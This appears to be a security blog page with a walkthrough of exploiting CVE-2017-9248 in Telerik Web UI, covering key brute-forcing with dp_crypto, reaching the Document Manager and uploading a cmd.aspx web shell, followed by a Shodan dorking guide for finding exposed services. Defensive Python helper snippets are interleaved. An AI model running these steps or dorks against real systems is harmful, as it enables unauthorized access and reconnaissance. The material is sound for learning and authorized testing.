Showing posts with label Exploit. Show all posts

Pwning Web Applications via Telerik Web UI oracle

 


Introduction


Over the past months, I’ve encountered a number of web applications that were using Telerik Web UI components for their application’s interface. There’s nothing wrong with using third-party components to build your application’s interface the way you want it. However, a vulnerability in these components puts every application that embeds them at risk.

In this post, I’m going to show you how I pwned several web applications, specifically ASP.NET ones, by abusing an outdated version of Telerik Web UI.

Identification

The simplest way to check if the application is using Telerik Web UI is to view its HTML source code.

Source1

TIP #1: There are times when you won’t find the exact string Telerik.Web.UI in the HTML code. However, if you find the string Telerik, keep browsing the other pages of the application and search for the string Telerik.Web.UI again.

If you’ve identified that the application is using Telerik Web UI, the next step is to identify its version and check if it’s vulnerable to CVE-2017-9248.

Finding the version can either be easy or tricky. To get the exact version, just view the HTML code. In the case below, the version information sits right next to the string Telerik.Web.UI. That’s easy.


Source2

However, there are cases where the version is not located right next to the string “Telerik.Web.UI”. Another way to identify the version of Telerik Web UI is by going through the HTML comments, as in the example below.

Source3


Once you have the version information, cross-reference it with the list of vulnerable versions. Based on the exploitation tool written by Paul Taylor (@bao7uo), the following versions are affected:


2007.1423        2008.31314       2010.31317        2013.1.403        2015.2.729
2007.1521        2009.1311        2011.1315         2013.1.417        2015.2.826
2007.1626        2009.1402        2011.1413         2013.2.611        2015.3.930
2007.2918        2009.1527        2011.1519         2013.2.717        2015.3.1111
2007.2101        2009.2701        2011.2712         2013.3.1015       2016.1.113
2007.21107       2009.2826        2011.2915         2013.3.1114       2016.1.225
2007.31218       2009.31103       2011.31115        2013.3.1324       2016.2.504
2007.31314       2009.31208       2011.3.1305       2014.1.225        2016.2.607
2007.31425       2009.31314       2012.1.215        2014.1.403        2016.3.914
2008.1415        2010.1309        2012.1.411        2014.2.618        2016.3.1018
2008.1515        2010.1415        2012.2.607        2014.2.724        2016.3.1027
2008.1619        2010.1519        2012.2.724        2014.3.1024       2017.1.118
2008.2723        2010.2713        2012.2.912        2015.1.204        2017.1.228
2008.2826        2010.2826        2012.3.1016       2015.1.225        2017.2.503
2008.21001       2010.2929        2012.3.1205       2015.1.401        2017.2.621
2008.31105       2010.31109       2012.3.1308       2015.2.604        2017.2.711
2008.31125       2010.31215       2013.1.220        2015.2.623        2017.3.913
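The identification steps above (find the Telerik.Web.UI string, read the version next to it or in an HTML comment, compare against the table) are easy to turn into a repeatable inventory check for your own applications. The following is an added example, not code from the post or from Telewreck: it pulls every Telerik.Web.UI assembly version out of a saved HTML page, including the percent-encoded form that appears inside script/resource URLs, reduces it to the three-part release form used in the table, and reports whether the table lists it. The sample page is constructed; the version list is copied from the table above as printed.

```python
import re
from urllib.parse import unquote_plus

# Versions listed in the post's table, copied as printed there (the older
# entries such as 2007.1423 keep the form in which the table shows them).
AFFECTED_VERSIONS = set("""
2007.1423  2008.31314 2010.31317 2013.1.403 2015.2.729
2007.1521  2009.1311  2011.1315  2013.1.417 2015.2.826
2007.1626  2009.1402  2011.1413  2013.2.611 2015.3.930
2007.2918  2009.1527  2011.1519  2013.2.717 2015.3.1111
2007.2101  2009.2701  2011.2712  2013.3.1015 2016.1.113
2007.21107 2009.2826  2011.2915  2013.3.1114 2016.1.225
2007.31218 2009.31103 2011.31115 2013.3.1324 2016.2.504
2007.31314 2009.31208 2011.3.1305 2014.1.225 2016.2.607
2007.31425 2009.31314 2012.1.215 2014.1.403 2016.3.914
2008.1415  2010.1309  2012.1.411 2014.2.618 2016.3.1018
2008.1515  2010.1415  2012.2.607 2014.2.724 2016.3.1027
2008.1619  2010.1519  2012.2.724 2014.3.1024 2017.1.118
2008.2723  2010.2713  2012.2.912 2015.1.204 2017.1.228
2008.2826  2010.2826  2012.3.1016 2015.1.225 2017.2.503
2008.21001 2010.2929  2012.3.1205 2015.1.401 2017.2.621
2008.31105 2010.31109 2012.3.1308 2015.2.604 2017.2.711
2008.31125 2010.31215 2013.1.220 2015.2.623 2017.3.913
""".split())

# The version sits next to the assembly name, as the post describes:
# "Telerik.Web.UI, Version=2014.3.1024.45, Culture=neutral, ...". Inside
# script URLs it is usually percent-encoded, so the page is decoded first.
VERSION_RE = re.compile(r"Telerik\.Web\.UI,\s*Version=(\d{4}(?:\.\d+)+)", re.IGNORECASE)


def extract_versions(html):
    """Return the distinct Telerik.Web.UI assembly versions found in a page."""
    return sorted(set(VERSION_RE.findall(unquote_plus(html))))


def normalize(version):
    """Reduce a 4-part assembly version ('2014.3.1024.45') to the 3-part
    release form the table uses ('2014.3.1024')."""
    return ".".join(version.split(".")[:3])


def is_listed(version):
    """True if the version's release appears in the post's affected list."""
    return normalize(version) in AFFECTED_VERSIONS


def check_html(html):
    """Map every version found in the page to whether the table lists it."""
    return {v: is_listed(v) for v in extract_versions(html)}


# Constructed sample page (not a real site): one percent-encoded reference in
# a script URL and one plain reference in an HTML comment, both the same build.
SAMPLE_HTML = """<html><head>
<script src="/Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=%3b%3bTelerik.Web.UI%2c+Version%3d2014.3.1024.45%2c+Culture%3dneutral"></script>
<!-- Telerik.Web.UI, Version=2014.3.1024.45, Culture=neutral -->
</head><body></body></html>"""

if __name__ == "__main__":
    for version, flagged in check_html(SAMPLE_HTML).items():
        state = "listed as affected" if flagged else "not in the list"
        print(f"Telerik.Web.UI {version}: {state}")
```

Feed it the saved source of each page you own that references Telerik; a version that is not in the list still deserves a look at the vendor's release notes, since the table only covers what the tool's author enumerated.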

Exploitation


Before jumping to the exploitation, we first have to locate the “Dialog Handler”, Telerik.Web.UI.DialogHandler.aspx. Most of the time it’s located in the root directory of the application; if it’s not there, try the sub-directories. To verify that you’ve found the right location, you should see the string “Loading the dialog…” when accessing the dialog handler.


Loading

TIP #2: Sometimes, the sub-directory where the dialog handler is located (or where Telerik Web UI is located in general) can be found from the HTML source code.

For the exploitation, use the tool written by Paul Taylor which can be downloaded here. Credits and big thanks to him for writing this one.

Here’s an example of the tool running to brute-force the key and discover the hidden link to the Document Manager page.

root@ewa:~# python dp_crypto.py -k http://www.example.com/Telerik.Web.UI.DialogHandler.aspx 48 hex 9

dp_crypto by Paul Taylor / Foregenix Ltd
CVE-2017-9248 - Telerik.Web.UI.dll Cryptographic compromise

Attacking http://www.example.com/Telerik.Web.UI.DialogHandler.aspx
to find key of length [48] with accuracy threshold [9]
using key charset [01234567890ABCDEF]

Key position 01: {D} found with 31 requests, total so far: 31
Key position 02: {3} found with 10 requests, total so far: 41
Key position 03: {A} found with 35 requests, total so far: 76
Key position 04: {D} found with 46 requests, total so far: 122
<------------------------ SNIPPED ------------------------>
Key position 45: {B} found with 50 requests, total so far: 1638
Key position 46: {3} found with 36 requests, total so far: 1674
Key position 47: {3} found with 50 requests, total so far: 1724
Key position 48: {F} found with 57 requests, total so far: 1781
Found key: D3AD[redacted]B33F
Total web requests: 1781
2014.3.1024: http://www.example.com/Telerik.Web.UI.DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document%20Manager&dpptn=&isRtl=false&dp=[snipped&redacted]


By visiting the “Document Manager” link, we see that we now have access to all the files and folders of the web server. More importantly, we see that we can upload arbitrary files to the server.


Document Manager


Here’s an example of the shell cmd.aspx file that I uploaded.


Shell


And here’s an example of a command execution using the uploaded shell.


Shell Upload

Telewreck


As part of my learning process, I decided to create a Burp Suite extension that can detect and exploit vulnerable instances of Telerik Web UI. I named it Telewreck and it is available at https://github.com/capt-meelo/Telewreck.

When running a passive scan, this extension will look for vulnerable versions of Telerik Web UI.


Passive


A tab where you can perform the exploitation step is also available.


Tab


That’s it!

Feel free to contribute to the development of the tool and to report or fix issues.

Youtube : Pandaantech

Shodan Dorks

 

Summary :

Shodan is a search engine for Internet-connected devices. It differs from search engines like Google and Bing: those are great for finding websites, whereas Shodan helps you find things like popular versions of Microsoft IIS, control servers for malware, how many hosts are affected by a new CVE, which countries are becoming more connected, the SSL certificates of websites, and so on.

Difference between Shodan and Google :

The major difference between Shodan and Google is that Shodan analyzes the Internet, while Google analyzes the World Wide Web.

Description :

Shodan is the most popular search engine of its kind. It can index anything from small desktops and CCTV cameras to nuclear power plants.

Nowadays Shodan has become very popular in the world of penetration testing, bug bounties, digital forensics, threat hunting and so on.

Shodan’s Search Query Insights :

Shodan gathers information by interacting with network services, and the information it collects is stored in an object called the banner. When you search for anything using a Shodan dork (search query), Shodan takes the information from the banner of that service and displays it to you. In simple words, a banner is metadata about a service: for HTTP it means the response headers, for FTP it means the welcome string. Different services have different banners; let’s look at the example of the vsftpd 3.0.3 and Siemens S7 banners.

vsftpd 3.0.3 - Banner
Siemens S7 - Banner
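To make the banner concept concrete, here is an added example, not code from the post or from Shodan: it takes two constructed banners, an HTTP response and an FTP 220 greeting modelled on vsftpd’s, and splits them into the fields Shodan indexes from them, namely the status code, the page title, the headers, and the product and version pulled out of the Server header or the greeting. The same header text is what the plain-string “custom dorks” later in the post (for example “Set-Cookie: PHPSESSID”) are matched against.

```python
import re

# Constructed banners (not captured from any real host). The HTTP one is a
# response as a scanner would record it; the FTP one follows the vsftpd
# greeting format the post's screenshot refers to.
HTTP_BANNER = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/1.18.0\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=constructed; path=/\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "\r\n"
    "<html><head><title>Grafana</title></head><body></body></html>"
)
FTP_BANNER = "220 (vsFTPd 3.0.3)\r\n"

# "nginx/1.18.0" -> product "nginx", version "1.18.0"
PRODUCT_RE = re.compile(r"^([A-Za-z][\w.-]*)/(\d[\w.]*)")
# "220 (vsFTPd 3.0.3)" -> product "vsFTPd", version "3.0.3"
FTP_GREETING_RE = re.compile(r"220[ -]\(?([A-Za-z][\w-]*)\s+v?(\d[\w.]*)\)?")


def parse_http_banner(raw):
    """Split an HTTP response into the fields Shodan indexes from it."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status_code = int(lines[0].split()[1])  # "HTTP/1.1 200 OK" -> 200
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    title = re.search(r"<title>(.*?)</title>", body, re.I | re.S)
    product, version = None, None
    match = PRODUCT_RE.match(headers.get("server", ""))
    if match:
        product, version = match.group(1), match.group(2)
    return {
        "http.status": status_code,
        "http.title": title.group(1).strip() if title else None,
        "product": product,
        "version": version,
        "headers": headers,
    }


def parse_ftp_banner(raw):
    """Pull product and version out of an FTP 220 greeting such as vsftpd's."""
    match = FTP_GREETING_RE.match(raw.strip())
    if not match:
        return {"product": None, "version": None}
    return {"product": match.group(1), "version": match.group(2)}


if __name__ == "__main__":
    print(parse_http_banner(HTTP_BANNER))
    print(parse_ftp_banner(FTP_BANNER))
```

Everything the parser extracts is information the service volunteers to any client that connects, which is why trimming Server and X-Powered-By headers and greeting strings on your own hosts shrinks what a search engine can index about them.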

Shodan has two versions :
1. Web Based
2. CLI Based

The Shodan command line interface (CLI) uses the Shodan Python library. The CLI is said to be more powerful than the web-based version, and the commands used on the web version and the CLI version differ slightly.

How to use Web Based version (Basics) ?

  1. Go to https://account.shodan.io/login?continue=http%3A%2F%2Fwww.shodan.io%2Fdashboard and login to your account
Web Login

2. Enter your shodan dork (query) in the search bar and hit enter

Search
Shodan Dork

4. You can also filter results using response codes

Shodan Dork - Response Filtering

How to use CLI Based version (Basics) ?

  1. sudo apt install python python3 python-pip python3-pip
  2. sudo apt install python-setuptools python3-setuptools
Python Setup Tools
Completed

3. sudo pip install shodan

Shodan Installation

4. After installation I ran the command shodan count microsoft iis 6.0, which gave me an error regarding the API key, so I ran the command shodan init <API-KEY> to configure my API key

Note : I took the API key from my shodan web account

API Key

5. Then I used the command shodan scan submit --force IP to scan a specific IP using the Shodan CLI

Shodan Scan

6. To search for a specific host I used the command shodan host IP

Host

Shodan Monitoring

Shodan monitoring helps you monitor your target’s IP addresses. It can monitor a single IP address, a list of IP addresses or even net blocks (IP subnets). It will help you identify industrial control systems, malware-related services, uncommon services, open databases, IoT devices, Internet-exposed services, expired SSL certificates, new services of your target and CVEs your target is vulnerable to.

How to use shodan for network monitoring (CLI) ?

  1. Use the command shodan alert to check the available options
Alert options

2. Then use the command shodan alert create “TargetName” <TargetIP> to add your target for network monitoring (you can also define an IP range / net block instead of a single IP)

Adding Target for Network Monitoring

3. Then use the command shodan alert triggers to check the available triggers

Alert Triggers
Alert Triggers

4. Then use the command shodan alert list to check the alert ID

Alert ID

5. Now for enabling the alerts for your target use the command shodan alert enable <alertID> <alertNames>

Creating Alerts for Target

Domain-based Networking Monitoring

Sometimes we are not aware of the IPs or network ranges of a target and only have a domain name to test. In that case Shodan provides domain-based network monitoring, where we can directly use the domain name for monitoring instead of IP addresses or network ranges.

Instance :

  1. Use the command shodan alert domain <domainName>

The best part is that after you give it the domain name, Shodan will automatically find all the subdomains and their IPs and create a network monitor for them. It keeps the monitor up to date as your target’s DNS information changes, and you can view your target’s information using the command shodan domain <domainName>

Instance :

Domain Information

How to use shodan for network monitoring (Web) ?

  1. Go to https://monitor.shodan.io/dashboard and click on “SETUP NETWORK MONITOR”
Network setup

2. Add the name and IP address of your target (you can also add a net range like 104.16.100.52/32) and click on Add Network

Target Name and IP

NOTE : Here on the right side you can see 16 IPs remaining, which means I can only add up to 16 IP addresses; this is because I have an academic membership. Different memberships have different benefits (check here : https://account.shodan.io/billing).

3. Now click on edit and scroll down to apply the trigger rules, then click on Save Changes

Editing for Trigger Rules
Trigger Rules

NOTE : I have chosen the trigger rules as per bug bounty. If you are doing a pentest you can select all of them.

4. Then click on dashboard > browse results

Dashboard
Browse Results
Results

Shodan as Browser Plug-in

Shodan comes in several forms. So far we have seen the CLI-based and web-based versions, but Shodan can also be used as a browser plugin, with limited functionality compared to the web and CLI versions.

The Shodan browser plugin automatically detects in which country or city the website is hosted, who owns the IP, and which services and ports are open. Apart from that it also gives you the SSL certificate, hostname, web technologies, organization name, ISP, ASN, domain records and subdomains of your target.

How to use browser plugin ?

  1. Go to https://chrome.google.com/webstore/detail/shodan/jjalcfnidlmpjhdfepjhjbhnhkbgleap/related and click on Add to Chrome
Shodan Browser Plugin - Add to Chrome

2. Click on Add extension

Add Extension

3. Now visit your target domain and click on the plugin

Target Domain
Target Information - Shodan Browser Plugin

4. Then right click on View IP Details > Open link in new tab

View IP Details
IP Details

5. For viewing domain details, right click on View domain details > Open link in new tab

View Domain Details
Domain Details

Shodan Dorks Insights :

General

  1. org

This Shodan dork is used to find all the assets related to your target organization, and you can also use the filtering options to remove output you don’t want. You can use this dork when your target company has wildcard domains in scope or when all the products belonging to the target company are in scope.

2. product

This Shodan dork is used to find targets based on a specific product. For example, if you want to find all the hosts of your target that are running the product mongodb, you can use this dork.

3. net

This Shodan dork takes a network range in CIDR notation. It is used to find the available hosts in a particular subnet. For example, if your target is 104.16.100.52/32, the /32 is the prefix length of the range (a /32 covers just that one address), and Shodan will list all the IP addresses that belong to that range.

4. asn

This Shodan dork is used to find all the hosts/domains of your target company. ASN stands for Autonomous System Number; searching by it finds all the Internet-connected assets that belong to your target company. For example, go to https://hackertarget.com/as-ip-lookup/ and enter the IP of your target; it will give you your target’s ASN, which you can then use to search for your target on Shodan.

5. hostname

This Shodan dork is used to find all the Internet-connected hosts of your target. For example, if you enter your target as www.hackerone.com, this dork will find all the hosts with this name connected to the Internet.

6. ip

This Shodan dork will help you find all of your target’s hosts that have the IP address you provide. For example, if the IP is 104.16.100.52, this dork will find all the hosts that belong to that particular IP.

7. all

This Shodan dork is used to find all the results for the keyword passed to it. For example, if you want all the results related to tesla, this dork will help you find them.

8. port

This Shodan dork is used to find your target’s open ports, which might leak sensitive information.
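The eight general filters above are easiest to understand by evaluating them against records. The following is an added example, written for this page rather than taken from Shodan or from the post: it runs org, product, net, asn, hostname, ip, port and all (plus bare keywords) over a few constructed banner records in the shape of Shodan’s JSON export, and counts facets the way shodan stats --facets port does. The matching semantics are my approximation of Shodan’s (org and all as substring matches, product as an exact name match, net as a real CIDR test via the ipaddress module), not the service’s actual query engine. None of the hosts is real.

```python
import ipaddress
import shlex
from collections import Counter

# Constructed banner records in the shape of Shodan's JSON export
# (ip_str, port, org, asn, hostnames, product). Documentation ranges only.
RECORDS = [
    {"ip_str": "192.0.2.10", "port": 443, "org": "Example Corp", "asn": "AS64496",
     "hostnames": ["www.example.com"], "product": "nginx"},
    {"ip_str": "192.0.2.11", "port": 27017, "org": "Example Corp", "asn": "AS64496",
     "hostnames": ["db.example.com"], "product": "MongoDB"},
    {"ip_str": "198.51.100.7", "port": 22, "org": "Other Hosting", "asn": "AS64497",
     "hostnames": ["vps7.other.example"], "product": "OpenSSH"},
    {"ip_str": "198.51.100.8", "port": 80, "org": "Other Hosting", "asn": "AS64497",
     "hostnames": [], "product": "Apache httpd"},
]


def _matches(record, key, value):
    """Evaluate one key:value filter; semantics approximate Shodan's."""
    v = value.lower()
    if key == "org":        # organisation name, substring match
        return v in record["org"].lower()
    if key == "product":    # product name, exact match
        return v == record["product"].lower()
    if key == "net":        # CIDR range; a /32 matches exactly one address
        return ipaddress.ip_address(record["ip_str"]) in ipaddress.ip_network(value, strict=False)
    if key == "asn":        # autonomous system number, e.g. AS64496
        return v == record["asn"].lower()
    if key == "hostname":   # exact hostname or any name under that domain
        return any(h.lower() == v or h.lower().endswith("." + v) for h in record["hostnames"])
    if key == "ip":         # single address
        return record["ip_str"] == value
    if key == "port":       # numeric port
        return record["port"] == int(value)
    if key == "all":        # keyword anywhere in the record's text
        blob = " ".join([record["ip_str"], record["org"], record["asn"],
                         record["product"], *record["hostnames"]]).lower()
        return v in blob
    raise ValueError(f"unknown filter {key!r}")


def search(records, query):
    """Return the records matching every filter in a Shodan-style query.
    Quoted values are supported; a bare word is treated like all:<word>."""
    results = []
    for record in records:
        ok = True
        for token in shlex.split(query):
            key, sep, value = token.partition(":")
            if not sep:
                key, value = "all", token
            if not _matches(record, key, value):
                ok = False
                break
        if ok:
            results.append(record)
    return results


def facets(records, field):
    """Count the values of one field, like `shodan stats --facets <field>`."""
    return Counter(str(r[field]) for r in records)


if __name__ == "__main__":
    for r in search(RECORDS, 'org:"Example Corp" port:27017'):
        print(r["ip_str"], r["product"])
    print(facets(search(RECORDS, "net:198.51.100.0/24"), "port"))
```

Running the same filters against an export of your own organisation’s results is a quick way to spot an address range or hostname that should not appear at all.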

HTTP

  1. http.component and http.component_category

There is a small difference between http.component and http.component_category: http.component is the name of the technology being used by the website (for example wordpress, jquery, mysql, nginx), while http.component_category is the category of the component (for example cms, javascript libraries, databases, web servers).

Component and Component Category

2. http.favicon.hash

The favicon is the small icon displayed in the browser’s address bar or tab and used for branding a website. We can calculate the hash of that icon by downloading the favicon.ico file, and that hash can be used in Shodan’s http.favicon.hash dork to find every host serving the same icon, which is how you find the instances an available exploit applies to.

3. http.html

This dork is used to find technologies and words in the source code of your target website. For example, if you want to check whether the website is using drupal 8.0 or not, you can simply pass the value to this dork and it will give you the results.

NOTE 1 : This dork is used when you know that a particular version of a technology (drupal) is vulnerable to a particular CVE.

NOTE 2 : This dork is used when your target has a huge scope of subdomains.

4. http.title

This dork is used to find whatever is written between the <title> tags of the website’s HTML. For example, if you want to find websites that have grafana as the title you can use this dork. A small difference between http.title and http.html is that http.html will give you more results compared to http.title, so you can use either of them.

Grafana

5. http.status

This dork is used to filter the output based on the status code of your target, for example 200, 403, 301, 302, 401 etc. You can also use the status code directly without this Shodan dork, by appending it with a + symbol, but it will then match every occurrence of 200 in the results, not only the status code.

6. http.waf

This dork is used to filter your targets according to their web application firewall. For example, if your target web application is using a Barracuda firewall, you can use this dork to find which of your target’s web application domains are behind this firewall.

NOTE 1 : This dork is used when you know that a particular payload or technique exists to bypass this firewall.

NOTE 2 : This dork is used when your target has a huge scope of subdomains.
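The http.favicon.hash value from item 2 above is not a plain file hash: the widely documented recipe is MurmurHash3 (32-bit, as the mmh3 package computes it) over the base64 text of the icon, with 76-character lines and a trailing newline, returned as a signed 32-bit integer. The following is an added example, my code rather than Shodan’s or the post author’s, implementing that from the standard library so a team can compute the hash of its own favicon and search for stray copies of its own deployments. The favicon bytes are a constructed placeholder, not a real icon; the test vectors for the hash itself are the published ones for MurmurHash3 x86_32.

```python
import base64


def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 (the algorithm behind mmh3.hash), unsigned result."""
    c1, c2, mask = 0xcc9e2d51, 0x1b873593, 0xffffffff
    h = seed & mask
    nblocks = len(data) // 4
    # Body: mix each little-endian 4-byte block into the state.
    for i in range(nblocks):
        k = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k = (k * c1) & mask
        k = ((k << 15) | (k >> 17)) & mask
        k = (k * c2) & mask
        h ^= k
        h = ((h << 13) | (h >> 19)) & mask
        h = (h * 5 + 0xe6546b64) & mask
    # Tail: the 0-3 leftover bytes.
    tail = data[nblocks * 4:]
    k = 0
    if len(tail) >= 3:
        k ^= tail[2] << 16
    if len(tail) >= 2:
        k ^= tail[1] << 8
    if len(tail) >= 1:
        k ^= tail[0]
        k = (k * c1) & mask
        k = ((k << 15) | (k >> 17)) & mask
        k = (k * c2) & mask
        h ^= k
    # Finalisation: fold in the length and avalanche.
    h ^= len(data)
    h ^= h >> 16
    h = (h * 0x85ebca6b) & mask
    h ^= h >> 13
    h = (h * 0xc2b2ae35) & mask
    h ^= h >> 16
    return h


def to_signed32(value: int) -> int:
    """Reinterpret an unsigned 32-bit value as the signed int mmh3 returns."""
    return value - (1 << 32) if value & 0x80000000 else value


def shodan_favicon_hash(favicon: bytes) -> int:
    """The http.favicon.hash recipe: MurmurHash3 of the base64 text of the
    icon (76-char lines plus trailing newline, as base64.encodebytes emits),
    returned as a signed 32-bit integer."""
    return to_signed32(murmur3_32(base64.encodebytes(favicon)))


# Constructed placeholder standing in for the bytes of a downloaded favicon.ico.
SAMPLE_FAVICON = bytes.fromhex("00000100010010100000010020006804000016000000") + b"\x00" * 64

if __name__ == "__main__":
    print("favicon hash:", shodan_favicon_hash(SAMPLE_FAVICON))
```

Because the hash covers the base64 text rather than the raw bytes, recomputing it with a plain file hash or with base64 that lacks the line breaks gives a different number; the base64.encodebytes call above is what keeps the result comparable with what the search engine stores.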

SSL

  1. ssl.alpn

Application-Layer Protocol Negotiation (ALPN) is a Transport Layer Security (TLS) extension that allows the application layer to negotiate which protocol should be performed over a secure connection. This dork can be used to identify which ALPN protocols your target domain supports. For example, if your target speaks HTTP/2.0 and you want to check whether it also supports HTTP/1.0 or HTTP/1.1, you can use this dork.

NOTE 1 : This dork is used when you want to check for http desync/smuggling attacks

NOTE 2 : This dork is used when your target has a huge scope of subdomains.

2. ssl.cert.subject.cn and ssl.cert.issuer.cn

There is a small difference between ssl.cert.subject.cn and ssl.cert.issuer.cn: ssl.cert.subject.cn is the name of your target company or organization, while ssl.cert.issuer.cn is the company that issues and verifies the certificate provided to your target company or organization.

NOTE 1 : This dork ssl.cert.issuer.cn will not be used in bug bounty.

Custom Dorks

  1. set-cookie

This custom Shodan dork is used to find the values that a cookie set in your target company’s responses contains.

2. x-drupal-cache

This custom Shodan dork is used to find Drupal caching issues for your target website.

3. access-control-allow-origin

This custom Shodan dork is used to find cross-origin resource sharing issues for your target website.

4. WWW-Authenticate

This custom Shodan dork will help you find authentication-related issues for your target website.

5. X-Magento-Cache-Debug

This custom Shodan dork is used to find Magento caching issues for your target website.

6. kbn-name

This custom Shodan dork is used to find Kibana applications for your target website.

7. x-forwarded-for and x-forwarded-host

These custom Shodan dorks are used to find header injection issues for your target website.

8. x-jenkins

This custom Shodan dork is used to find Jenkins servers for your target website.

NOTE 1 : You still need to enumerate and look for the vulnerabilities. These dorks will not give you a direct hit on vulnerabilities.

NOTE 2 : These dorks will help you know what vulnerabilities you can look for on your target domains, if any of your targets is using the above-mentioned headers.

Shodan Dorking Usage Diagram

Shodan - Mindmap

Shodan Dorking (Web)

org:"target.com"
http.status:"<status_code>"
product:"<Product_Name>"
port:<Port_Number> "Service_Message"
port:<Port_Number> "Service_Name"
http.component:"<Component_Name>"
http.component_category:"<Component_Category>"
http.waf:"<firewall_name>"
http.html:"<Name>"
http.title:"<Title_Name>"
ssl.alpn:"<Protocol>"
http.favicon.hash:"<Favicon_Hash>"
net:"<Net_Range>" (for example 104.16.100.52/32)
ssl.cert.subject.cn:"<Domain.com>"
asn:"<ASnumber>"
hostname:"<hostname>"
ip:"<IP_Address>"
all:"<Keyword>"
"Set-Cookie: phpMyAdmin"
"Set-Cookie: lang="
"Set-Cookie: PHPSESSID"
"Set-Cookie: webvpn"
"Set-Cookie:webvpnlogin=1"
"Set-Cookie:webvpnLang=en"
"Set-Cookie: mongo-express="
"Set-Cookie: user_id="
"Set-Cookie: phpMyAdmin="
"Set-Cookie: _gitlab_session"
"X-elastic-product: Elasticsearch"
"x-drupal-cache"
"access-control-allow-origin"
"WWW-Authenticate"
"X-Magento-Cache-Debug"
"kbn-name: kibana"
"X-App-Name: kibana"
"x-jenkins"

URLs for Shodan Dorks (Web)

  1. http.html

https://gist.github.com/JerryShah3/8e25ecfeb9fa88784aa274d97b3cf86f

2. http.title

https://gist.github.com/JerryShah3/ccd9c8bd7eafa52b69f5a76917eec074

3. http.status

https://gist.github.com/JerryShah3/e4018ecce48eefcb8e02ebadf9468ae8

4. port

https://gist.github.com/JerryShah3/7c5cb2f25ceb3e522bfdfd0f9a68f6bb

5. http.favicon.hash

https://gist.github.com/JerryShah3/9eb4189b9b450d32c229b9c0cfbe3988

6. http.component

https://gist.github.com/JerryShah3/95d3a1baf2d29973286effb491684297

7. http.component_category

https://gist.github.com/JerryShah3/71bbbd368af846304e8588747984663b

8. http.waf

https://gist.github.com/JerryShah3/db7e47d1497d64e80c841961f3fb48b3

9. ssl.alpn

https://gist.github.com/JerryShah3/91c9fc5116bd58d3f92a454cb544b4f3

10. product

https://gist.github.com/JerryShah3/82346509de0208cf0d932e92bf20f0db

Shodan Dorking (CLI)

shodan host <IP>
shodan stats --facets port,org ssh
shodan domain <domain-name>
shodan honeyscore IP
shodan alert create “HackerOne” 104.16.100.52 (It will create an alert for the IP and will also provide an alert ID)
shodan stats --facets org discourse
shodan download --limit -1 <filename> 'title:"IBM"'
shodan parse --fields ip_str,port,org --separator , filename.json.gz (to see the downloaded file contents by filtering it)
shodan domain hackerone.com
shodan alert create “Hyatt Hotels” 140.95.0.0/16
shodan alert enable <alert ID> new_service,open_database,vulnerable,ssl_expired,internet_scanner,uncommon
shodan alert hackerone.com

NOTE : I have not used the CLI version much, so I have included the CLI dorks that I know and have used.

Special Thanks for Proof Reading and Contributing in Dorks : Jinay Patel